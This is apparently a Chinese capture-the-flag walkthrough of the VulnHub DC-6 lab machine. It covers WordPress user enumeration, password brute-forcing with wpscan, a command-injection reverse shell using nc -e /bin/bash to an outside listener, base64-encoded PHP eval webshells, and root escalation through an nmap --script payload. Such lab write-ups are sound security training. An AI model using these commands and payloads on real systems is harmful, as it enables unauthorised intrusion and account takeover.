vulnhub-DC6打靶记录

知识点

• WordPress枚举用户名
• WordPress爆破用户密码
• 命令执行漏洞
• SUID nmap提权

nmap扫描

需要将ip 192.168.0.141绑定hosts，Wappalyzer识别出来为WordPress

wpscan

枚举用户名

wpscan --url http://wordy/ --enumerate u

结果：

admin,graham,mark,sarah,jens

[+] admin
 | Found By: Rss Generator (Passive Detection)
 | Confirmed By:
 |  Wp Json Api (Aggressive Detection)
 |   - http://wordy/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[+] graham
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] mark
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] sarah
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

[+] jens
 | Found By: Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 | Confirmed By: Login Error Messages (Aggressive Detection)

靶场提示：用到rockyou.txt，该文件kali自带的

枚举用户密码

wpscan --url http://wordy/ -U u.txt -P passwords.txt

[SUCCESS] - mark / helpdesk01

命令执行漏洞

反弹shell

nc -lvnp 8085 监听
127.0.0.1;nc 192.168.0.101 8085 -e /bin/bash

写webshell

这样写的，会被过滤成为 <?php eval(['a']);?> 删除了$_POST

echo "<?php eval($_POST['a']);?>" > aa.php  

使用base64来写shell

echo "PD9waHAgZXZhbCgkX1BPU1RbJ2EnXSk7Pz4" | base64 -d > shell.php

/home/mark/stuff/things-to-do.txt 该目录下有一个graham用户的密码

Things to do:

- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

/home/jens/backups.sh

#!/bin/bash
tar -czf backups.tar.gz /var/www/html

尝试登录graham用户,密码GSo7isUM1D4

ssh graham@192.168.0.141

登录成功

nmap提权

sudo -l
指向了刚刚翻找到的sh文件，/home/jens/backups.sh

以jens用户权限执行backups.sh文件，但是没有提权成功

sudo -u jens /home/jens/backups.sh

再次执行 sudo -l 发现变化了，提示nmap root用户权限执行

Matching Defaults entries for jens on dc-6:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jens may run the following commands on dc-6:
    (root) NOPASSWD: /usr/bin/nmap

辅助网站 GTFOBins：

https://gtfobins.github.io/gtfobins/nmap/

payload：nmap执行需要指定root用户执行

TF=$(mktemp)
echo 'os.execute("/bin/sh")' > $TF
sudo -u root nmap --script=$TF